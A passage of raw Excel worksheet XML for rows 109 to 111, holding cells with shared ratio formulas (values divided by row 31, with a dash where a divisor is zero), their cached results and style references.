        <v>2579</v>
      </c>
      <c r="S109" s="501">
        <f t="shared" ref="S109:V109" si="142">S61/S$31</f>
        <v>0.003007849754</v>
      </c>
      <c r="T109" s="501">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="U109" s="501">
        <f t="shared" si="142"/>
        <v>1.444444444</v>
      </c>
      <c r="V109" s="501">
        <f t="shared" si="142"/>
        <v>4</v>
      </c>
      <c r="W109" s="501">
        <f t="shared" si="104"/>
        <v>28</v>
      </c>
      <c r="X109" s="501">
        <f t="shared" ref="X109:AF109" si="143">X61/X$31</f>
        <v>1688.090909</v>
      </c>
      <c r="Y109" s="501">
        <f t="shared" si="143"/>
        <v>115.8571429</v>
      </c>
      <c r="Z109" s="501">
        <f t="shared" si="143"/>
        <v>18.85152838</v>
      </c>
      <c r="AA109" s="501">
        <f t="shared" si="143"/>
        <v>0.1469740634</v>
      </c>
      <c r="AB109" s="501">
        <f t="shared" si="143"/>
        <v>9.652173913</v>
      </c>
      <c r="AC109" s="501">
        <f t="shared" si="143"/>
        <v>4.5</v>
      </c>
      <c r="AD109" s="501">
        <f t="shared" si="143"/>
        <v>0.0002601492435</v>
      </c>
      <c r="AE109" s="501">
        <f t="shared" si="143"/>
        <v>2.541666667</v>
      </c>
      <c r="AF109" s="502">
        <f t="shared" si="143"/>
        <v>0.5229700391</v>
      </c>
      <c r="AG109" s="271"/>
      <c r="AH109" s="352" t="s">
        <v>2579</v>
      </c>
      <c r="AI109" s="518">
        <f t="shared" ref="AI109:DJ109" si="144">IF(AI$30=0,"-",AI61/AI$31)</f>
        <v>0.002201834862</v>
      </c>
      <c r="AJ109" s="518">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="AK109" s="518">
        <f t="shared" si="144"/>
        <v>2.5</v>
      </c>
      <c r="AL109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="AM109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="AN109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="AO109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="AP109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="AQ109" s="518">
        <f t="shared" si="144"/>
        <v>1.393162393</v>
      </c>
      <c r="AR109" s="518">
        <f t="shared" si="144"/>
        <v>1.25</v>
      </c>
      <c r="AS109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="AT109" s="518">
        <f t="shared" si="144"/>
        <v>3</v>
      </c>
      <c r="AU109" s="518">
        <f t="shared" si="144"/>
        <v>3.5</v>
      </c>
      <c r="AV109" s="518">
        <f t="shared" si="144"/>
        <v>2</v>
      </c>
      <c r="AW109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="AX109" s="518">
        <f t="shared" si="144"/>
        <v>2.875</v>
      </c>
      <c r="AY109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="AZ109" s="518">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="BA109" s="518">
        <f t="shared" si="144"/>
        <v>28</v>
      </c>
      <c r="BB109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="BC109" s="518">
        <f t="shared" si="144"/>
        <v>6189.666667</v>
      </c>
      <c r="BD109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="BE109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="BF109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="BG109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="BH109" s="518">
        <f t="shared" si="144"/>
        <v>792</v>
      </c>
      <c r="BI109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="BJ109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="BK109" s="518">
        <f t="shared" si="144"/>
        <v>6.333333333</v>
      </c>
      <c r="BL109" s="518">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="BM109" s="518">
        <f t="shared" si="144"/>
        <v>45.68074119</v>
      </c>
      <c r="BN109" s="518">
        <f t="shared" si="144"/>
        <v>1.804440154</v>
      </c>
      <c r="BO109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="BP109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="BQ109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="BR109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="BS109" s="518">
        <f t="shared" si="144"/>
        <v>6</v>
      </c>
      <c r="BT109" s="518">
        <f t="shared" si="144"/>
        <v>2</v>
      </c>
      <c r="BU109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="BV109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="BW109" s="518">
        <f t="shared" si="144"/>
        <v>4</v>
      </c>
      <c r="BX109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="BY109" s="518">
        <f t="shared" si="144"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ109" s="518">
        <f t="shared" si="144"/>
        <v>0.162601626</v>
      </c>
      <c r="CA109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="CB109" s="518">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="CC109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="CD109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="CE109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="CF109" s="518">
        <f t="shared" si="144"/>
        <v>4</v>
      </c>
      <c r="CG109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="CH109" s="518">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="CI109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="CJ109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="CK109" s="518">
        <f t="shared" si="144"/>
        <v>13</v>
      </c>
      <c r="CL109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="CM109" s="518">
        <f t="shared" si="144"/>
        <v>81</v>
      </c>
      <c r="CN109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="CO109" s="518">
        <f t="shared" si="144"/>
        <v>0.3333333333</v>
      </c>
      <c r="CP109" s="518">
        <f t="shared" si="144"/>
        <v>20</v>
      </c>
      <c r="CQ109" s="518">
        <f t="shared" si="144"/>
        <v>3</v>
      </c>
      <c r="CR109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="CS109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="CT109" s="518">
        <f t="shared" si="144"/>
        <v>0.007984031936</v>
      </c>
      <c r="CU109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="CV109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="CW109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="CX109" s="518">
        <f t="shared" si="144"/>
        <v>5.5</v>
      </c>
      <c r="CY109" s="518">
        <f t="shared" si="144"/>
        <v>2.823529412</v>
      </c>
      <c r="CZ109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="DA109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="DB109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="DC109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="DD109" s="518">
        <f t="shared" si="144"/>
        <v>5</v>
      </c>
      <c r="DE109" s="518">
        <f t="shared" si="144"/>
        <v>1.6</v>
      </c>
      <c r="DF109" s="518">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="DG109" s="518" t="str">
        <f t="shared" si="144"/>
        <v>-</v>
      </c>
      <c r="DH109" s="518">
        <f t="shared" si="144"/>
        <v>1.053333333</v>
      </c>
      <c r="DI109" s="518">
        <f t="shared" si="144"/>
        <v>0.4980548267</v>
      </c>
      <c r="DJ109" s="519">
        <f t="shared" si="144"/>
        <v>1.363636364</v>
      </c>
      <c r="DK109" s="271"/>
      <c r="DO109" s="279"/>
      <c r="DP109" s="271"/>
      <c r="DQ109" s="271"/>
      <c r="DR109" s="271"/>
      <c r="DS109" s="271"/>
      <c r="DT109" s="271"/>
      <c r="DU109" s="271"/>
      <c r="DV109" s="271"/>
      <c r="DW109" s="271"/>
      <c r="DX109" s="271"/>
      <c r="DY109" s="271"/>
      <c r="DZ109" s="271"/>
      <c r="EA109" s="271"/>
      <c r="EB109" s="271"/>
      <c r="EC109" s="271"/>
      <c r="ED109" s="280"/>
      <c r="EG109" s="279"/>
      <c r="EH109" s="271"/>
      <c r="EI109" s="271"/>
      <c r="EJ109" s="271"/>
      <c r="EK109" s="271"/>
      <c r="EL109" s="271"/>
      <c r="EM109" s="271"/>
      <c r="ER109" s="271"/>
      <c r="ES109" s="271"/>
      <c r="ET109" s="271"/>
      <c r="EU109" s="271"/>
      <c r="EV109" s="271"/>
      <c r="EW109" s="271"/>
      <c r="EX109" s="271"/>
      <c r="EY109" s="271"/>
      <c r="EZ109" s="271"/>
      <c r="FA109" s="280"/>
    </row>
    <row r="110">
      <c r="J110" s="277"/>
      <c r="K110" s="434"/>
      <c r="L110" s="353"/>
      <c r="M110" s="353"/>
      <c r="N110" s="354"/>
      <c r="O110" s="278"/>
      <c r="Q110" s="271"/>
      <c r="R110" s="352" t="s">
        <v>2580</v>
      </c>
      <c r="S110" s="501">
        <f t="shared" ref="S110:V110" si="145">S62/S$31</f>
        <v>0.003594747267</v>
      </c>
      <c r="T110" s="501">
        <f t="shared" si="145"/>
        <v>0</v>
      </c>
      <c r="U110" s="501">
        <f t="shared" si="145"/>
        <v>6.047619048</v>
      </c>
      <c r="V110" s="501">
        <f t="shared" si="145"/>
        <v>4.631578947</v>
      </c>
      <c r="W110" s="501">
        <f t="shared" si="104"/>
        <v>26</v>
      </c>
      <c r="X110" s="501">
        <f t="shared" ref="X110:AF110" si="146">X62/X$31</f>
        <v>1.363636364</v>
      </c>
      <c r="Y110" s="501">
        <f t="shared" si="146"/>
        <v>117.5714286</v>
      </c>
      <c r="Z110" s="501">
        <f t="shared" si="146"/>
        <v>555.2184586</v>
      </c>
      <c r="AA110" s="501">
        <f t="shared" si="146"/>
        <v>1.60518732</v>
      </c>
      <c r="AB110" s="501">
        <f t="shared" si="146"/>
        <v>12.34782609</v>
      </c>
      <c r="AC110" s="501">
        <f t="shared" si="146"/>
        <v>6.6</v>
      </c>
      <c r="AD110" s="501">
        <f t="shared" si="146"/>
        <v>0.0003696857671</v>
      </c>
      <c r="AE110" s="501">
        <f t="shared" si="146"/>
        <v>3.458333333</v>
      </c>
      <c r="AF110" s="502">
        <f t="shared" si="146"/>
        <v>0.04550586192</v>
      </c>
      <c r="AG110" s="271"/>
      <c r="AH110" s="352" t="s">
        <v>2580</v>
      </c>
      <c r="AI110" s="518">
        <f t="shared" ref="AI110:DJ110" si="147">IF(AI$30=0,"-",AI62/AI$31)</f>
        <v>0.002348623853</v>
      </c>
      <c r="AJ110" s="518">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="AK110" s="518">
        <f t="shared" si="147"/>
        <v>4</v>
      </c>
      <c r="AL110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="AM110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="AN110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="AO110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="AP110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="AQ110" s="518">
        <f t="shared" si="147"/>
        <v>4.222222222</v>
      </c>
      <c r="AR110" s="518">
        <f t="shared" si="147"/>
        <v>62</v>
      </c>
      <c r="AS110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="AT110" s="518">
        <f t="shared" si="147"/>
        <v>4</v>
      </c>
      <c r="AU110" s="518">
        <f t="shared" si="147"/>
        <v>6</v>
      </c>
      <c r="AV110" s="518">
        <f t="shared" si="147"/>
        <v>2</v>
      </c>
      <c r="AW110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="AX110" s="518">
        <f t="shared" si="147"/>
        <v>3.375</v>
      </c>
      <c r="AY110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="AZ110" s="518">
        <f t="shared" si="147"/>
        <v>4</v>
      </c>
      <c r="BA110" s="518">
        <f t="shared" si="147"/>
        <v>26</v>
      </c>
      <c r="BB110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="BC110" s="518">
        <f t="shared" si="147"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="BE110" s="518">
        <f t="shared" si="147"/>
        <v>4</v>
      </c>
      <c r="BF110" s="518">
        <f t="shared" si="147"/>
        <v>1.5</v>
      </c>
      <c r="BG110" s="518">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="BH110" s="518">
        <f t="shared" si="147"/>
        <v>792</v>
      </c>
      <c r="BI110" s="518">
        <f t="shared" si="147"/>
        <v>2</v>
      </c>
      <c r="BJ110" s="518">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="BK110" s="518">
        <f t="shared" si="147"/>
        <v>8</v>
      </c>
      <c r="BL110" s="518">
        <f t="shared" si="147"/>
        <v>2</v>
      </c>
      <c r="BM110" s="518">
        <f t="shared" si="147"/>
        <v>1099.804678</v>
      </c>
      <c r="BN110" s="518">
        <f t="shared" si="147"/>
        <v>209.2291506</v>
      </c>
      <c r="BO110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="BP110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="BQ110" s="518">
        <f t="shared" si="147"/>
        <v>1.004901961</v>
      </c>
      <c r="BR110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="BS110" s="518">
        <f t="shared" si="147"/>
        <v>6.5</v>
      </c>
      <c r="BT110" s="518">
        <f t="shared" si="147"/>
        <v>2</v>
      </c>
      <c r="BU110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="BV110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="BW110" s="518">
        <f t="shared" si="147"/>
        <v>4</v>
      </c>
      <c r="BX110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="BY110" s="518">
        <f t="shared" si="147"/>
        <v>4.777777778</v>
      </c>
      <c r="BZ110" s="518">
        <f t="shared" si="147"/>
        <v>2.203252033</v>
      </c>
      <c r="CA110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="CB110" s="518">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="CC110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="CD110" s="518">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="CE110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="CF110" s="518">
        <f t="shared" si="147"/>
        <v>5</v>
      </c>
      <c r="CG110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="CH110" s="518">
        <f t="shared" si="147"/>
        <v>6</v>
      </c>
      <c r="CI110" s="518">
        <f t="shared" si="147"/>
        <v>34</v>
      </c>
      <c r="CJ110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="CK110" s="518">
        <f t="shared" si="147"/>
        <v>19</v>
      </c>
      <c r="CL110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="CM110" s="518">
        <f t="shared" si="147"/>
        <v>85.5</v>
      </c>
      <c r="CN110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="CO110" s="518">
        <f t="shared" si="147"/>
        <v>2.833333333</v>
      </c>
      <c r="CP110" s="518">
        <f t="shared" si="147"/>
        <v>23</v>
      </c>
      <c r="CQ110" s="518">
        <f t="shared" si="147"/>
        <v>3</v>
      </c>
      <c r="CR110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="CS110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="CT110" s="518">
        <f t="shared" si="147"/>
        <v>0.007984031936</v>
      </c>
      <c r="CU110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="CV110" s="518">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="CW110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="CX110" s="518">
        <f t="shared" si="147"/>
        <v>9</v>
      </c>
      <c r="CY110" s="518">
        <f t="shared" si="147"/>
        <v>3.764705882</v>
      </c>
      <c r="CZ110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="DA110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="DB110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="DC110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="DD110" s="518">
        <f t="shared" si="147"/>
        <v>7</v>
      </c>
      <c r="DE110" s="518">
        <f t="shared" si="147"/>
        <v>2.4</v>
      </c>
      <c r="DF110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="DG110" s="518" t="str">
        <f t="shared" si="147"/>
        <v>-</v>
      </c>
      <c r="DH110" s="518">
        <f t="shared" si="147"/>
        <v>1.064444444</v>
      </c>
      <c r="DI110" s="518">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="DJ110" s="519">
        <f t="shared" si="147"/>
        <v>1.727272727</v>
      </c>
      <c r="DK110" s="271"/>
      <c r="DO110" s="279"/>
      <c r="DP110" s="271"/>
      <c r="DQ110" s="271"/>
      <c r="DR110" s="271"/>
      <c r="DS110" s="271"/>
      <c r="DT110" s="271"/>
      <c r="DU110" s="271"/>
      <c r="DV110" s="271"/>
      <c r="DW110" s="271"/>
      <c r="DX110" s="271"/>
      <c r="DY110" s="271"/>
      <c r="DZ110" s="271"/>
      <c r="EA110" s="271"/>
      <c r="EB110" s="271"/>
      <c r="EC110" s="271"/>
      <c r="ED110" s="280"/>
      <c r="EG110" s="279"/>
      <c r="EH110" s="271"/>
      <c r="EI110" s="271"/>
      <c r="EJ110" s="271"/>
      <c r="EK110" s="271"/>
      <c r="EL110" s="271"/>
      <c r="EM110" s="271"/>
      <c r="ER110" s="271"/>
      <c r="ES110" s="271"/>
      <c r="ET110" s="271"/>
      <c r="EU110" s="271"/>
      <c r="EV110" s="271"/>
      <c r="EW110" s="271"/>
      <c r="EX110" s="271"/>
      <c r="EY110" s="271"/>
      <c r="EZ110" s="271"/>
      <c r="FA110" s="280"/>
    </row>
    <row r="111">
      <c r="J111" s="277"/>
      <c r="K111" s="352" t="s">
        <v>2559</v>
      </c>
      <c r="L111" s="403" t="s">
        <v>2560</v>
      </c>
      <c r="M111" s="403" t="s">
        <v>2561</v>
      </c>
      <c r="N111" s="404" t="s">
        <v>2562</v>
      </c>
      <c r="O111" s="278"/>
      <c r="Q111" s="271"/>
      <c r="R111" s="352" t="s">
        <v>2581</v>
      </c>
      <c r="S111" s="501">
        <f t="shared" ref="S111:V111" si="148">S63/S$31</f>
        <v>0.0067493214</v>
      </c>
      <c r="T111" s="501">
        <f t="shared" si="148"/>
        <v>0</v>
      </c>
      <c r="U111" s="501">
        <f t="shared" si="148"/>
        <v>7.30952381</v>
      </c>
      <c r="V111" s="501">
        <f t="shared" si="148"/>
        <v>8.736842105</v>
      </c>
      <c r="W111" s="501">
        <f t="shared" si="104"/>
        <v>52</v>
      </c>
      <c r="X111" s="501">
        <f t="shared" ref="X111:AF111" si="149">X63/X$31</f>
        <v>8352.090909</v>
      </c>
      <c r="Y111" s="501">
        <f t="shared" si="149"/>
        <v>141.4285714</v>
      </c>
      <c r="Z111" s="501">
        <f t="shared" si="149"/>
        <v>607.8188363</v>
      </c>
      <c r="AA111" s="501">
        <f t="shared" si="149"/>
        <v>2.16426513</v>
      </c>
      <c r="AB111" s="501">
        <f t="shared" si="149"/>
        <v>21.52173913</v>
      </c>
      <c r="AC111" s="501">
        <f t="shared" si="149"/>
        <v>19.5</v>
      </c>
      <c r="AD111" s="501">
        <f t="shared" si="149"/>
        <v>0.0008078318614</v>
      </c>
      <c r="AE111" s="501">
        <f t="shared" si="149"/>
        <v>5.583333333</v>
      </c>
      <c r="AF111" s="502">
        <f t="shared" si="149"/>
        <v>0.1275727312</v>
      </c>
      <c r="AG111" s="271"/>
      <c r="AH111" s="352" t="s">
        <v>2581</v>
      </c>
      <c r="AI111" s="518">
        <f t="shared" ref="AI111:DJ111" si="150">IF(AI$30=0,"-",AI63/AI$31)</f>
        <v>0.003743119266</v>
      </c>
      <c r="AJ111" s="518">
        <f t="shared" si="150"/>
        <v>3</v>
      </c>
      <c r="AK111" s="518">
        <f t="shared" si="150"/>
        <v>9.25</v>
      </c>
      <c r="AL111" s="518">
        <f t="shared" si="150"/>
        <v>1</v>
      </c>
      <c r="AM111" s="518">
        <f t="shared" si="150"/>
        <v>0</v>
      </c>
      <c r="AN111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="AO111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="AP111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="AQ111" s="518">
        <f t="shared" si="150"/>
        <v>4.316239316</v>
      </c>
      <c r="AR111" s="518">
        <f t="shared" si="150"/>
        <v>65.75</v>
      </c>
      <c r="AS111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="AT111" s="518">
        <f t="shared" si="150"/>
        <v>58</v>
      </c>
      <c r="AU111" s="518">
        <f t="shared" si="150"/>
        <v>39.5</v>
      </c>
      <c r="AV111" s="518">
        <f t="shared" si="150"/>
        <v>8</v>
      </c>
      <c r="AW111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="AX111" s="518">
        <f t="shared" si="150"/>
        <v>5.6875</v>
      </c>
      <c r="AY111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="AZ111" s="518">
        <f t="shared" si="150"/>
        <v>11.5</v>
      </c>
      <c r="BA111" s="518">
        <f t="shared" si="150"/>
        <v>52</v>
      </c>
      <c r="BB111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="BC111" s="518">
        <f t="shared" si="150"/>
        <v>30567</v>
      </c>
      <c r="BD111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="BE111" s="518">
        <f t="shared" si="150"/>
        <v>154</v>
      </c>
      <c r="BF111" s="518">
        <f t="shared" si="150"/>
        <v>2.166666667</v>
      </c>
      <c r="BG111" s="518">
        <f t="shared" si="150"/>
        <v>5</v>
      </c>
      <c r="BH111" s="518">
        <f t="shared" si="150"/>
        <v>796</v>
      </c>
      <c r="BI111" s="518">
        <f t="shared" si="150"/>
        <v>6</v>
      </c>
      <c r="BJ111" s="518">
        <f t="shared" si="150"/>
        <v>4</v>
      </c>
      <c r="BK111" s="518">
        <f t="shared" si="150"/>
        <v>10</v>
      </c>
      <c r="BL111" s="518">
        <f t="shared" si="150"/>
        <v>6</v>
      </c>
      <c r="BM111" s="518">
        <f t="shared" si="150"/>
        <v>1135.167679</v>
      </c>
      <c r="BN111" s="518">
        <f t="shared" si="150"/>
        <v>272.7936293</v>
      </c>
      <c r="BO111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="BP111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="BQ111" s="518">
        <f t="shared" si="150"/>
        <v>1.068627451</v>
      </c>
      <c r="BR111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="BS111" s="518">
        <f t="shared" si="150"/>
        <v>19</v>
      </c>
      <c r="BT111" s="518">
        <f t="shared" si="150"/>
        <v>6</v>
      </c>
      <c r="BU111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="BV111" s="518">
        <f t="shared" si="150"/>
        <v>2</v>
      </c>
      <c r="BW111" s="518">
        <f t="shared" si="150"/>
        <v>14</v>
      </c>
      <c r="BX111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="BY111" s="518">
        <f t="shared" si="150"/>
        <v>8.111111111</v>
      </c>
      <c r="BZ111" s="518">
        <f t="shared" si="150"/>
        <v>2.365853659</v>
      </c>
      <c r="CA111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="CB111" s="518">
        <f t="shared" si="150"/>
        <v>8</v>
      </c>
      <c r="CC111" s="518">
        <f t="shared" si="150"/>
        <v>4</v>
      </c>
      <c r="CD111" s="518">
        <f t="shared" si="150"/>
        <v>5</v>
      </c>
      <c r="CE111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="CF111" s="518">
        <f t="shared" si="150"/>
        <v>13</v>
      </c>
      <c r="CG111" s="518">
        <f t="shared" si="150"/>
        <v>1</v>
      </c>
      <c r="CH111" s="518">
        <f t="shared" si="150"/>
        <v>17</v>
      </c>
      <c r="CI111" s="518">
        <f t="shared" si="150"/>
        <v>39</v>
      </c>
      <c r="CJ111" s="518">
        <f t="shared" si="150"/>
        <v>4</v>
      </c>
      <c r="CK111" s="518">
        <f t="shared" si="150"/>
        <v>39</v>
      </c>
      <c r="CL111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="CM111" s="518">
        <f t="shared" si="150"/>
        <v>152</v>
      </c>
      <c r="CN111" s="518">
        <f t="shared" si="150"/>
        <v>4</v>
      </c>
      <c r="CO111" s="518">
        <f t="shared" si="150"/>
        <v>4.833333333</v>
      </c>
      <c r="CP111" s="518">
        <f t="shared" si="150"/>
        <v>70</v>
      </c>
      <c r="CQ111" s="518">
        <f t="shared" si="150"/>
        <v>22</v>
      </c>
      <c r="CR111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="CS111" s="518">
        <f t="shared" si="150"/>
        <v>0</v>
      </c>
      <c r="CT111" s="518">
        <f t="shared" si="150"/>
        <v>0.01397205589</v>
      </c>
      <c r="CU111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="CV111" s="518">
        <f t="shared" si="150"/>
        <v>9</v>
      </c>
      <c r="CW111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="CX111" s="518">
        <f t="shared" si="150"/>
        <v>18</v>
      </c>
      <c r="CY111" s="518">
        <f t="shared" si="150"/>
        <v>4.647058824</v>
      </c>
      <c r="CZ111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="DA111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="DB111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="DC111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="DD111" s="518">
        <f t="shared" si="150"/>
        <v>21</v>
      </c>
      <c r="DE111" s="518">
        <f t="shared" si="150"/>
        <v>4.6</v>
      </c>
      <c r="DF111" s="518">
        <f t="shared" si="150"/>
        <v>11</v>
      </c>
      <c r="DG111" s="518" t="str">
        <f t="shared" si="150"/>
        <v>-</v>
      </c>
      <c r="DH111" s="518">
        <f t="shared" si="150"/>
        <v>3.1</v>
      </c>
      <c r="DI111" s="518">
        <f t="shared" si="150"/>
        <v>0</v>
      </c>
      <c r="DJ111" s="519">
        <f t="shared" si="150"/>
        <v>2</v>
      </c>
      <c r="DK111" s="271"/>
      <c r="DO111" s="279"/>
      <c r="DP111" s="271"/>
      <c r="DQ111" s="271"/>
      <c r="DR111" s="271"/>
      <c r="DS111" s="271"/>
      <c r="DT111" s="271"/>
      <c r="DU111" s="271"/>
      <c r="DV111" s="271"/>
      <c r="DW111" s="271"/>
      <c r="DX111" s="271"/>
      <c r="DY111" s="271"/>
      <c r="DZ111" s="271"/>
      <c r="EA111" s="271"/>
      <c r="EB111" s="271"/>
      <c r="EC111" s="271"/>
      <c r="ED111" s="280"/>
      <c r="EG111" s="279"/>
      <c r="EH111" s="271"/>
      <c r="EI111" s="271"/>
      <c r="EJ111" s="271"/>
      <c r="EK111" s="271"/>
      <c r="EL111" s="271"/>
      <c r="EM111" s="271"/>
